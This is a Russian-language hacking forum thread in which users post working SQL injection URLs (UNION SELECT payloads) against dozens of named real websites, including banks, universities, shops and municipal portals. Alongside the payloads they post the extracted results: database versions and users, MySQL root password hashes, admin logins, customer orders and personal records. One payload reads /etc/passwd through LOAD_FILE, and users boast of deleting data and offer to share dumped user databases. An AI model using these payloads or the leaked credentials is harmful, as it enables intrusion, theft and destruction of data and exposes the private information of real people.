http://fifa08.in/index.php?site=gallery&picID=1'
http://fifa08.in/index.php?site=forum_topic&topic=1'&page=1&sort=&type=DESC

POST'om
POST /comments.php HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

name=1&mail=1&url=1&captcha=1&captcha_hash='&referer=1&parentID=1&type=1&ip=1&savevisitorcomment=1


POST /index.php?site=register HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

nickname=1&username=1&pwd1=1&pwd2=1&mail=1&captcha=1&captcha_hash='&save=1

Скажите как вытянуть отсюда что-нибудь!!!!???

Скажите как вытянуть отсюда что-нибудь!!!!???

вопросы задаем в другом топике.. -20 :D
=======================================
#######sql_inj#######
http://www.hanima.com/new/gcat.php?l=2&uid=70dm9ftguhnb6n5estcl76vlh1&gcat=4+union+select+1,2,3,4,concat(version(),0x3a, user(),0x3a,database()),6,7,8,9/*
---------------info------------
4.1.20:hanima@localhost:hanima
#######sql_inj#######
http://frvmedia.com/1-communiques.php?xlang=fr&xid=-132'+union+select+1,2,3,concat(version(),0x3a,user (),0x3a,database()),5,6,7/*
---------------info------------
5.0.45:frvmedia_admin@localhost:frvmedia_main

http://www.6seconds.org/cert/show.php?ID=-68+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,database(),22,23,24,25,26,27 ,28,version(),30,31,32,33,34,35,36,37,38,39/*

6cert@localhost 6
certlist
5.0.45-community

во, млин, запарило... по работе нужно лазить по чужим сайтам с ВЕЧЕРНИМИ ПЛАТЬЯМИ и смотреть разные фишки на сайтах...
после 10-го или 15-го решил отвлечься:
результат:
http://www.solange.ru/gallery/shop.phtm?s=99999+union+select+1,VERSION(),3,4,5/*

4.1.21-standard
intermoda@83.69.224.34
intermoda

www.humanmedia.ru
Наша компания является эксклюзивным продавцом рекламного времени на тематических каналах «НТВ-Плюс». Фактически это новый инструмент рекламных коммуникаций.
version() >5 (information_schema)

_http://www.humanmedia.ru/page.php?id=2+and+1=-1+union+select+1,concat(0xEBEEE3E8ED202D20,login,0 x3C62723E,0xEFE0F0EEEBFC202D20,password,0x3C62723E EFF0E8E2FB202D20,priv),3,4,5,6,7,8,9,10+from+tv_ad mins

логин - nets
пароль - nets
привы - 1

17:tv_admins
18:tv_ban
19:tv_news
20:tv_pages
21:tv_sample
22:tv_subscribe
23:tv_subscribe_delivery
24:tv_variables
20:tv_pages
20:--1:title
20:--2:body
20:--3:description1
20:--4:description2
20:--5:description3
20:--6:priority
20:--7:public
20:--8:pid
20:--9:menu
17:tv_admins
17:--1:login
17:--2:password
17:--3:name
17:--4:email
17:--5:priv



Админку ненашел 8( письмо админу отправил 8)

Только учусь!
------------------------------
http://donetsk.life.dn.ua/
Комунальный портал города Донецка.
-------------------------------
5.0.37-log
life
life@localhost
-------------------------------
http://donetsk.life.dn.ua/nb/view.php?id=-5995/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10/**/from/**/forums_auth/**/limit/**/1,1/*
-------------------------------
есть интересные таблицы: (но я их не перебирал)
board_admin_comment
f1
f1_bodies
f2
f2_bodies
f3
f3_bodies
f4
f4_bodies
f5
f5_bodies
forums
forums_auth
forums_forum2group
forums_groups
forums_moderators
forums_user2group
gal_user
guide
mail_archieve
maillist
maillist_users
poll_poll
poll_vote
prob
---------------------
если кто вытянет полную базу-киньте в личку(интересно посмотреть, а колупаться дальше влом :)

И снова горе веб-дизайнеры: "GiG Web solutions" Киев

Форум - Web программирование :D (PHP,HTML,CSS,JavaScript,ASP)

_http://gig.kiev.ua/show_message.php?conf_id=-8+union+select+1,aes_decrypt(aes_encrypt(user(),0x 71),0x71),3,4,5,6/*&upper_id=0

gigkievua_user@localhost
gigkievua_db1
5.0.41-community

ветка пятая, раскручивать не стал
КТО ИМ ДАЁТ ДЕНЕГ???

Только учусь!
------------------------------
http://donetsk.life.dn.ua/
Комунальный портал города Донецка.
все таки решил добить сам. пользователей больше 2000 (у меня пока 700, но скоро добъю) вывод типа имя пользователя,пароль,имя,мы� �о,аська(оч много элитных. Хотел бы себе :) ) кому надо обращайтесь в личку поделюсь.
------------------------------
прошу прощенья, если не в этой теме. Не наказывайте пожалуйста :)

мда, все-таки решил выложить на благо родного ачата...
ВНИМАНИЕ: Сегодня у нас БАНК (точнее сайт онлайн банкинга) - дырявый как windows 98 =)

Версия мускула - 5 с хреном, соответственно, есть доступ к : _http://www.mcb-bank.com/index.php?nd=menu&id=9999+union+select+1,TABLE_NAME,3,4,5,6,7,8+from +INFORMATION_SCHEMA.TABLES/*

Наиболее приглянувшиеся мне таблицы:
===================================

isearch_admin_log

messages
message_id
message_image
message_month
message_year
message_title

specials
id
titel
text
image
active
...

users
id
username
password
admin
lastlogin

===================================

и самое интересное - КАВЫЧКИ НЕ ФИЛЬТРУЮТСЯ ВООБЩЕ!!!
так что, есть возможность залить шелл.

Вобщем, пользуйтесь на здоровье ;)

fantastic.library.cornell.edu


http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+concat_ws( 0x3a3a3a,user(),database(),version()),2,3,4,5,6,7, 8,9,10,11,12+from+mysql.user/*

user() = fan@localhost
database() - fantastic
version() - 4.1.7-standart

http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+LOAD_FILE( 0x2f6574632f706173737764),2,3,4,5,6,7,8,9,10,11,12/*

http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+concat_ws( 0x3a3a3a,user,password),2,3,4,5,6,7,8,9,10,11,12+f rom+mysql.user/*

Смотрим исходник =)

FreeBSD Forum!!

http://www.bsdforums.org/forums/items/main.php?type=-1%20union%20select%201,user(),3,4,5,6,7,8,9,10,11, 12,13--

cycyouth.org ROOT

http://www.cycyouth.org/main.php?pgID=-1%20union%20select%201,concat(user,0x3a,password,0 x3a,file_priv),3,4,5,6,7,8,9,10+from+mysql.user--

root:*D4F86802E5F140FEA24A52DF0D5B9B0381A5119D:Y

tukums.lv ROOT

http://aa.tukums.lv/Default.asp?id=-1%20union%20select%201,2,password,4,5,6,7,8,9+from +mysql.user--

*923518145726A3E8F9098E43D6A56C2BC44BD1DC

Внимание!!!
никто никогда не хотел себе швейцарские часы?
теперь вы можете себе такое позволить :-D
---------------------------------------------------------------
шоп специализирующийся на продаже швейцарских часов
----------------------------------------------------------------
http://www.deka.dn.ua/navigation.php?nav_id=-8+union+select+1,2,3,4,5,6,concat(version(),0x3a,u ser(),0x3a,database()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29/*

4.0.24-log:bazik@localhost:deka
---------------------------------------------------------------
письмо админу отправил

После часика мучений удалос убить базу заказоф и юзероф и добавить новай тур = )

http://img264.imageshack.us/my.php?image=kareidzigz5.jpg

computergiants.com Шоп....Просто Шоп
_http://www.computergiants.com/stores/sitelet.asp?siteletid=-1'%66%72%6f%6d+1,2/*

Светотехника
http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,concat_ws(0x3a,version(),user( ),database()),3/*

5.0.32-Debian_7etch1-log:firstline_base@77.221.130.10:firstline_base

имена таблиц странные:

2103_forum_auth_access
2103_forum_banlist
2103_forum_categories
2103_forum_config
2103_forum_confirm
2103_forum_disallow
2103_forum_forum_prune
2103_forum_forums
2103_forum_groups
2103_forum_posts
2103_forum_privmsgs
2103_forum_privmsgs_text
2103_forum_ranks
2103_forum_sessions_keys
2103_forum_user_group

2103_forum_users

Туристическое снаряжение
-------------------------------------
http://www.alexikaoutdoor.com.ua/product.php?prod_id=-177+union+select+1,2,3,4,5,6,7,8,9,10/*
4.0.27-standard-log:dumala2_alexikaoutdoor:dumala2_axbase@localhos t

http://www.hpol.org/transcript.php?id=-72+union+select+null,user(),version(),null,version ()/*
user:ro@localhost
ver:5.0.27
db:hpol
нет file_priv !

банк
_http://www.eccb-centralbank.org/News/press.asp?offset= -1' SE LECT TABL E_SCHEMA,COLUMN_NAME FROM INFORMATION_SCH EMA.COLUMNS

brocken.de
http://www.brocken.de/community/pinnwand/pinnwand.php?IDMBTH=-12+union+select+0,1,concat(USER(),0x3a,VERSION(),0 x3a,DATABASE()),3,4,5,6,7,8,9,10/*&UID=0&tx=1203010570&chat=
brocken@localhost:4.1.22-log:brocken_community
---------------------------------------------------------
ci.emeryville.ca.us
http://www.ci.emeryville.ca.us/calendar/print/week.php?cid=-1+union+select+0,1,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),3,4,5,6,7/*&catid=1&d=&w=4&m=-14&y=2006
jpc_nixc0re@mimas.abag.ca.gov:4.1.20:mysql
http://www.ci.emeryville.ca.us/calendar/week.php?cid=-1+union+select+0,1,concat(user,0x3a,password),3,4, 5,6,7+from+mysql.user/*
root:13d6f0d419ea128c
---------------------------------------------------------
wcfcroquet.org
http://www.wcfcroquet.org/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSIO N(),0x3a,DATABASE())+using+latin1),2/*&cid=&w=&d=9&m=1&y=2008&selection=1
wcf@193.111.201.122:4.1.10a:wcfcal
---------------------------------------------------------
phplite.com
http://www.phplite.com/products/calendarexpress/demo/admin/userdetails.php?uid=-9+union+select+0,concat(USER(),0x3a,VERSION(),0x3a ,DATABASE()),2,3,4,5,6,7,8/*
phplite@localhost:4.1.22-standard:cosmo_ce2

reversedelta.com

http://www.reversedelta.com/page.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14--

user() = reversedelta@localhost
version() = 4.1.22-standard
database() = reversedelta_-_content

Донецкий комбинат замороженных продуктов

http://www.tsundon.dn.ua/news-full.php?nid=-16+union+select+1,2,3,4,5/*
4.1.22-log:tsundon@localhost:tsundon

tbl_news
другие таблицы не нашел.
---------------------------------------
оч интересный вывод ошибки, по крайней мере я еще такой не видел :)

bridgewater.edu

http://www.bridgewater.edu/index.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20--

user() = web_manager@localhost
version() = 5.0.22-log
database() = bc_website

experts.uchicago.edu

http://experts.uchicago.edu/experts.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42--

user() = www@localhost
version() = 4.0.24-standard
database() = newsoffice

und.edu

http://www2.und.edu/our/news/print_news.php?id=-1%20union%20select%201,2,3,4,5,6,7,8--

user() = our@localhost
version() = 5.0.44sp1-enterprise-gpl-log
database() = our

pride.uoregon.edu

http://pride.uoregon.edu/section.php?id=-1%20union%20select%201,2,3,4,5,6--

user() = pride@localhost
version() = 5.0.32-Debian_7etch1-log
database() = pride

hg.med.umich.edu

http://www.hg.med.umich.edu/facultyprofile.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32--

user() = webby@localhost
version() = 5.1.17-beta
database() = cmsys

mysql5
http://www.farmnetservices.com/agents/wi.php?ID=4%20union%20select%201,2,3,concat_ws(0x3 A,table_schema,TABLE_NAME),5,6,7,8,9,0,1,2,3,4,5,6 ,17+FROM+INFORMATION_SCHEMA.TABLES/*
http://poserpros.daz3d.com/store/merchstore.php?merch=337%20union%20select%201,2,3, 4,concat(user_password,char(58),username),6,7,8,9, 0,1,2,3,4,5,6,7%20FROM+phpbb_users/*

Ежедневная газета АНТИСПИД НАРКОСТОП
http://noaids.ru/print_news.php?id=-852+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2/*

user=samara63_noaids@localhost
database=samara63_noaids
version=5.0.45

http://www.cci.gomel.by/dop/print_news.php?id=-420+union+select+1,2,3,4,5,database(),7,8,9,10,11, 12/*

user=btpp@localhost
database=cci01
varsion=4.0.18

http://www.uprava.org/section.php?id=-34+union+select+1,DATABASE(),user(),4,5,6,7/*

user uprava-org@he2.hoster.ru
database uprava-org
varsion 4.0.27


http://www.zimaspb.ru/news.php?id_news=-19+union+select+1,user(),3,4,database(),6,version( )/*


http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,4,User(),DataBase(),version( ),8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10 ,1,2,3,4,5,6,7,38/*

Веломагазин

http://rider.dn.ua/news.php?id=11+union+select+1,2,concat(username,0x 3a,user_password),4,5+from+phpbb_users/*

root:63669023999824a9197274768beb958d

http://atitlan-online.com/index.php?option=com_notebook&task=viewNote&id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+ati_users/*
http://atitlan-online.com/administrator/
admin;admin

research.ohiou.edu

http://www.research.ohiou.edu/index.php?section=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14--

user() = mediabrite@research.ohiou.edu
version() = 4.1.19-log
database() = vpresearch

http://www.ifsociety.com/shop.php?id=99999+union+select+VERSION(),2,3,4,5,6 /*
Версия: 4.1.20-log
юзер: ifsociety@10.0.0.207
база: ifsociety

_http://www.serbia-money.ru/ru/news.php?news=87
_http://www.serbia-money.ru/ru/news.php?news=87%27
_http://www.serbia-money.ru/ru/news.php?news=87+order+by+9/*
_http://www.serbia-money.ru/ru/news.php?news=-87+union+select+1,2,3,4,5,6,7,8,9/*
_http://www.serbia-money.ru/ru/news.php?news=-87+union+select+1,2,3,database(),user(),6,7,8,vers ion()/*

er.a_.serb
serbia_admin@localhost
5.0.45-community-log

магазины
------------------
_http://www.lakkk.com/lib.php?lib_id=-29+union+select+database(),version(),user(),4,5/*

5.0.45-log - u90286_old
u90286@10.10.223.249

базы две u90286_old и u90286 доступ есть
-------------------
_http://www.gorshkov.ru/index.php?full=9999999+union+select+1,version(),3, user()/*&rand=21002

4.0.24_Debian-10sarge1-log
u664@localhost
u664_2

таблицы так и не подобрал
--------------------

http://www.rtcmagazine.com/home/article.php?id=99999'+union+select+VERSION()/*

версия: 4.1.20

Юзер: rtcgroup@64.13.248.195

БАЗА : rtcgroup
===========================
http://fullhousemagazine.co.uk/compdets.php?id=99999+union+select+1,2,VERSION(),4 ,5,6,7,8,9,10,11,12,13,14,15,16/*

Мускул: 4.0.27-standard-log

Юзер: dbo205665539@212.227.119.170

База: db205665539

_http://www.serbia-money.ru/ru/news.php?news=87
_http://www.serbia-money.ru/ru/news.php?news=87%27
_http://www.serbia-money.ru/ru/news.php?news=87+order+by+9/*
_http://www.serbia-money.ru/ru/news.php?news=-87+union+select+1,2,3,4,5,6,7,8,9/*
_http://www.serbia-money.ru/ru/news.php?news=-87+union+select+1,2,3,database(),user(),6,7,8,vers ion()/*

er.a_.serb
serbia_admin@localhost
5.0.45-community-log

Самое вкусное:
база таблица столбец
serbia_serbia zakaz id
serbia_serbia zakaz date_time
serbia_serbia zakaz fio_d
serbia_serbia zakaz tel_d
serbia_serbia zakaz address_d
serbia_serbia zakaz email_d
serbia_serbia zakaz zakaz

Пример:
http://www.serbia-money.ru/ru/news.php?news=-87+union+select+1,2,3,4,concat_ws(0x3a,id,date_tim e,fio_d,tel_d,address_d,email_d,zakaz),6,7,8,9+fro m+serbia_serbia.zakaz+limit+1+offset+1/*

2
2008-02-04 15:55:28:
vefv
vfevf
fee@mail.ru
fee@mail.ru:P0001 - 1 динар - 1шт. (2000 руб.)
Всего 1шт. на сумму 2000 руб
//******************************************

http://www.shopaware.com/product/product_detail.php?id=-134+union+select+1,2,3,version(),database(),user() ,7,8,9,10,11/*

4.0.27-standard-log 0
dbo204500512@74.208.16.93
//*********************************

http://www.jed-afrique.org/news.php?id_news=-11+union+select+1,user(),3,database(),5,6,7,8,9,10 ,11,12,13,14,15,16,version()/*

[ 4.1.22-standard ]
jed_root@localhost
jed_jed

//***********************************
ТОЧНЫЙ ПРОГНОЗ ПОГОДЫ ДЛЯ ЛЮБОЙ ТОЧКИ УКРАИНЫ

http://meteoprog.com.ua/news.php?command=more&id_news=-64+union+select+1,2,database(),user(),5,6/*

4.1.22
meteoprog
meteoprog@localhost
//**********************************

Финансовая группа ИНТРАСТ

http://www.intrast.ru/news.php?id_news=-69339+union+select+1,2,concat(user,char(58),passwo rd),4,5+from+mysql.user+limit+1/*

login --> root
password --> 6e83ef3f5ae34aa4 -->gznfxjr

//************************************

http://zapravkin.com.ua/news.php?id_news=-49+union+select+1,2,3,4,5,6,7,version(),user(),10, 11,12,13,database()/*

mandrey_zap@localhost
mandrey_zap
4.0.27-standard-log

aspireusa.net

http://aspireusa.net/category.php?cid=-1%20union%20select%201,2,3--

user() = aspire@localhost
version() = 4.1.22-log
database() = aspire

--------------

elsemanario.net

http://www.elsemanario.net/print_col.php?cid=-1%20union%20select%201,2,3,4,5--


user() = hdn_bo_user@neveri.venred.com
version() = 5.0.22
database() = elsema_elsemanario_net_-_db

viiphoto.com

http://www.viiphoto.com/frame-movie.php?vID=-1%20union%20select%201,2,3,4,5,6,7,8,9--

user() = VIIPHOTO@192.168.1.22
version() = 4.0.12-MAX-LOG
database() = VIIPHOTO

--------------

swclassiccars.com

http://www.swclassiccars.com/car.php?vid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14--

user() = swclassiccars@64.202.163.213
version() = 4.0.27-max-log
database() = swclassiccars

--------------

egotvonline.com

http://www.egotvonline.com/video.php?vid=1'%20union%20select%201,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*

user() = egotv_website@localhost
version() = 4.1.22-standard
database() = egotv_egotv

--------------

stormnigeria.com

http://stormnigeria.com/music/videos.php?vid=-1%20union%20select%201,2,3,4,5,6,7--

user() = stormnig_storm@localhost
version() = 4.0.27-standard
database() = stormnig_storm

--------------

sctflash.com

http://www.sctflash.com/vehicle_show_profile.php?VID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20--

user() = root@localhost
version() = 4.1.20
database() = sct

http://www.prom.kz/modules/biblio/card.php?id=1380%20and%200%20union%20select%201,2, 3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),user( ),database())--

http://www.biomusic.ru/album.php?id=15819%20and%201=0%20union%20select%20 1,user(),Database(),4,5,6,7,user_pass,9,10,11,12,1 3%20from%20users%20limit%203--

http://mp3.volpi.ru/view.php?id=3893%20and%201=0%20union%20select%201, concat(user,char(58),password),3,concat(user,char( 58),password),5,4,7,8,9,10,11,12,13%20from%20mysql .user--

привет всем!
нужна помощь в выводе базы данных, через information_schema.tables у меня невышло
получается вывести только USER(), DATABASE(), VERSION()
http://www.manhattan-receivers.com/modules/articles/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20/*

привет всем!
нужна помощь в выводе базы данных, через information_schema.tables у меня невышло
получается вывести только USER(), DATABASE(), VERSION()
http://www.manhattan-receivers.com/modules/articles/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20/*

1. не там запостил.
2. версия 4 -> information_schema в ней нету.

Видеоархив болельщиков ФК Спартак

http://www.video-soccer.com/section.php?sec=-15+union+select+concat_ws(0x9a,user(),database(),v ersion())/*

VIDEOSOB@LINHOST209.PROD.MESA1.SECURESERVER.NET
VIDEOSOB
4.0.27-

//**************************

Белгородская торгово промышленная палата
Выставочный комплекс "Белэкспоцентр"

http://belexpocentr.ru/show.php?id=-89+union+select+1,2,3,4,5,concat_ws(char(47),user( ),database(),version()),7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21/*

belexpocentr@localhost
www_belexpocentr_ru
5.0.44

открыта база INFORMATION_SCHEMA
//**************************

Всеукраинская молодежная организация “Союз молоді регіонів України”.

http://smru.com.ua/news.php?type=n&num=-2054+union+select+1,Concat_ws(char(58),last,first, otch,birthday,educ,inst,spec,work,post,region,raio n,town,street,dom,kv,hphone,wphone,mphone,ser,num, kem,kogda),3,4,5+from+smrucom_smru.enter+limit+1+o ffset+0/*
//***************************

AMT&C - лидер Российского рынка магнитных материалов и технологий

http://www.ndfeb.ru/news.php?act=news&num=-53+union+select+1,2,user(),database(),5,6,version( )/*

00146026@localhost
db00146026
4.1.21-log

//**************************

http://www.wellness-hall.ru/news.php?num=-4+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5/*

u39784@10.10.223.205
u39784
5.0.45-log

//************************

http://www.keckobservatory.org/article.php?id=-46+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11/*

root@localhost
keck
4.1.21

//**********************
Украинский готический портал

http://gothic.kiev.ua/ukrrus/reviews/show.php?id=226'+and+1=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,DataBase(),user(),16,17,18,19/*

4.1.22-log
gothicdb
gothic@hosting03.iptelecom.net.ua


p.s. Вот че я сегодня за ночь накопал
Всем привет

http://www.zycie.czest.pl/modules/show.php?id=0x35333927%20union+select+1,2,3,concat _ws(0x3a,user(),database(),version()),5,6,7,8,9/*
zycie@localhost:zycie:5.0.33-log
http://www.sudguru.com/show.php?x=1&at=1&sn=0x3127%20union+select+1,2,3,concat_ws(0x3a,user (),database(),version()),5,6,7,8,9,10/*
sudee_g@localhost:sudee_s:4.1.22-standard 6
http://medhavi.edu.np/show.php?sn=0x3127%20union+select+1,2,3,concat_ws( 0x3a,user(),database(),version()),5,6,7,8,9,10/*
medhavi_sunil@localhost:medhavi_sunil:4.1.22-standard
http://perplexus.info/show.php?pid=2343&cid=0x313733373327%20union+select+1,2,3,4,concat_w s(0x3a,user(),database(),version()),6,7,8,9,10/*
www@localhost: perplexus:4.0.21-standard
http://linkdump.be/index.php?y=2004&m=0x3627%20union+select+concat_ws(0x3a,user(),data base(),version()),2,3,4,5,6,7,8/*
kwaadblo_dumpmas@localhost:kwaadblo_linkdump:4.1.2 2-standard
http://www.cuplfil.com/english/show.php?ArticleID=0x313827%20union+select+1,2,3,4 ,5,6,7,8,concat_ws(0x3a,user(),database(),version( )),10,11,12,13,14,15,16,17,18/*
root@localhost:zhengfa_en:4.0.14-max-nt
http://www.ihrc.org.uk/show.php?id=0x3137353427%20union+select+1,2,concat _ws(0x3a,user(),database(),version()),4,5,6,7,8,9, 10,11,12,13/*
dbo120565932@212.227.119.149:db120565932:4.0.27-standard-log
http://www.flugzeugbilder.de/show.php?id=0x31323332333827%20union+select+1,2,3, 4,5,concat_ws(0x3a,user(),database(),version()),7, 8,9,10,11,12,13,14,15,16,17,18,19,20/*
pp@localhost:fb:4.0.21-Max-log
http://www.newmedicine.pl/show.php?ktory=0x343027%20union+select+1,2,3,conca t_ws(0x3a,user(),database(),version()),5,6,7,8,9,1 0,11,12,13/*
515707HQWV038@www4:515707HQWV038:4.1.22-standard-log
http://www.pnmedycznych.pl/show.php?ktory=0x393227%20union+select+1,concat_ws (0x3a,user(),database(),version()),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16/*
515707HQWV038@www4:515707HQWV038:4.1.22-standard-log
http://www.nowapediatria.pl/show.php?ktory=0x3127%20union+select+1,2,concat_ws (0x3a,user(),database(),version()),4,5,6,7,8,9,10, 11,12,13,14/*
515707HQWV038@www4:515707HQWV038:4.1.22-standard-log
http://www.nowamedycyna.pl/show.php?ktory=0x3127%20union+select+1,concat_ws(0 x3a,user(),database(),version()),3,4,5,6,7,8,9,10, 11,12,13,14/*
515707HQWV038@www4:515707HQWV038:4.1.22-standard-log
Ну вот так вот :p

CJLO.com
http://www.cjlo.com/magazine/features.php?ID=99999+union+select+1,VERSION(),3,4 ,5,6,7,8,9,10/*
VERSION: 4.1.21-log
DATABASE: cjlocom
USER: cjlocom@localhost

iqmagazineonline.com
http://www.iqmagazineonline.com/issue.php?crumb=ARCHIVE&id=99999+union+select+1,2,3,4,5,VERSION(),7,8,9/*
VERSION: 4.1.20
DATABASE: iqmag
USER: iqmag@localhost

hdtvmagazine.com
http://www.hdtvmagazine.com/programming/guide-station.php?id=99999+union+select+1,2,VERSION(),4, 5,6,7,8,9,10,11,12,13,14,15/*
VERSION: 4.1.20-standard-log
DATABASE: main
USER: hdtv_web@localhost
//вывод в title


OUR-KIEV.com
http://our-kiev.com/banks/details.php?id=99999+union+select+1,VERSION(),3,4, 5,6,7,8,9,10/*
VERSION: 5.0.41-community
USER: ourkiev_ourkiev@localhost
DATABASE: ourkiev_main

banksandbrokersfootball.co.uk
http://www.banksandbrokersfootball.co.uk/news.php?id=99999+union+select+1,VERSION(),3,4,5,6 ,7/*
VERSION: 4.0.24_Debian-10sarge2-log
USER: web176u1@localhost
DATABASE: web176db1

outerbanksbeach.com
http://www.outerbanksbeach.com/listings.php?id=99999+union+select+1,USER(),3,4,5, 6,7,8,9,10,11/*
VERSION: 4.1.20
DATABASE: outerbanksbeach
USER: obbuser@localhost

ameritron.com кто доковыряет то молодец)

http://www.ameritron.com/products.php?catid=3+where+prod.id=3/*

thermatex.co.uk

http://www.thermatex.co.uk/products.php?CatID=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,concat_ws (0x3a,version(),user(),database()),5--
5.0.51-log:thermat_root@80.243.176.29:thermat_thermatex_c o_uk

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
KEY_COLUMN_USAGE
USER_PRIVILEGES
VIEWS
oldreseller
tblcontent
tblprod
tblprodcat
tblprodold
tblprodtype
tblreseller
tbluser
Username
Password
UserType
id
nic:nac:Admin:1
bob1:robert:standard:2
bob2:robert:Admin:3
al:alb1genesis:admin:4

kupiteplo.ru
http://www.kupiteplo.ru/products.php?catid=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase())--
4.1.21-log:00105446@localhost:db00105446
locksafe.com.au
http://www.locksafe.com.au/products.php?catId=-1+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3--
4.1.20-log:locksafe@mysql.web.westnet.com.au:locksafe
blueovalindustries.com
http://www.blueovalindustries.com/products.php?catID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,0--
5.0.51a:webaccess@localhost:blueovalindustries

root:*6D2ADA5F6F4F9A257108D488A7270AE3B61543E9:Y:l ocalhost
root:*50A1A0ED3324F8FDBABD11942CE78F3261E2470E:Y:b luekey2.bluekeyinc.com
adm:*50A1A0ED3324F8FDBABD11942CE78F3261E2470E:Y:%
webaccess:*3834634CF62016AE9ADB081C643955D18109FB1 E:Y:localhost
keith:*3C2D7500AD57EFBCA3064D22BFE074A4CF1674F9:Y: %
newkirk_backup:*1B68D251DBE5F2053D62E070E3BE403D87 79FE23:Y:%
newwebaccess:*3C2D7500AD57EFBCA3064D22BFE074A4CF16 74F9:Y:secure.massresort.com
migrate:*1B68D251DBE5F2053D62E070E3BE403D8779FE23: N:64.34.179.15
servare:*1015954A8D4060B721936C7DE453BAD4E3AD4A27: Y:bluekey2.bluekeyinc.com

provenrepellents.com

http://www.provenrepellents.com/products.php?catID=-1+union+select+1,2,3,4,5,6,7,concat(username,char( 58),password,char(58),accountID,char(58),realname) +from+users+limit+3,1--


kelly:12144a6901bc651c826d1d6c613ab5db:0:Kelly Thornton
danny:307ce74f5fa0fb48a6fa4158147277c3:0:Daniel Beckley
randy:12144a6901bc651c826d1d6c613ab5db:0:Randy Atkins
anne:74563ba21a90da13dacf2a73e3ddefa7:0:Anne McMahon

realwheel.net

http://www.realwheel.net/products.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7, 8,9,10,1,2--

4.1.22-standard:realecg_dba@localhost:realecg_real
harvestsafe.com


http://www.harvestsafe.com/products.php?catID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database())--

5.0.51a:webaccess@localhost:bluekey2
root:*6D2ADA5F6F4F9A257108D488A7270AE3B61543E9:Y:l ocalhost
adam-rouilly.co.uk

http://www.adam-rouilly.co.uk/products.php?catid=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5--

4.1.22-standard:adam_adam@localhost:adam_adamrouilly

101.ru
http://www.101.ru/?an=guest_book&kw1=33'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2/*
вывода не добился - а подбирать лень

www.finnews.ru ТИЦ сайтов: finnews.ru - 1300
http://www.finnews.ru/activity.php?id=50000+union+select+concat_ws(0x3a, username,user_password,user_email,user_icq)+from+p hpbb_users+limit+1,1/*

vsheff:f09dfc16c0947a6db07c337967b2634a:support@fi nnews.ru:99596309
хэш не брутится нифига и к аське не пдходит

159932
вот вывод ты со столбцами ошибся:
_http://www.101.ru/?an=guest_book&kw1=-33'+union+select+1,2,3,4,5,6,version(),8,user(),da tabase(),11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29/*

www.dom-zdorovja.ru
http://www.dom-zdorovja.ru/doc.php?id=0x3727%20union+select+1,2,3,4,concat_ws (0x3a,user(),database(),version()),6/*
domzdor7_alexey@localhost:domzdor7_shop:4.1.22-log

www.brendgoda.ru
http://brendgoda.ru/ru/news/index.php?id=0x363227%20union+select+1,2,3,4,conca t_ws(0x3a,user(),database(),version()),6,7,8,9,10/*
bestbrand@localhost:bestbrand:4.1.22

elevatemagazine.com
http://www.elevatemagazine.com/e.enhancement/article.php?id=99999+union+select+1,VERSION(),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17/*
VERSION: 5.0.22
USER: root@localhost
DATABASE: elevatemag

skratchmagazine.com
http://www.skratchmagazine.com/interviews/interviews.php?id=99999+union+select+1,2,3,VERSION (),5,6,7/*
VERSION: 4.0.24-nt
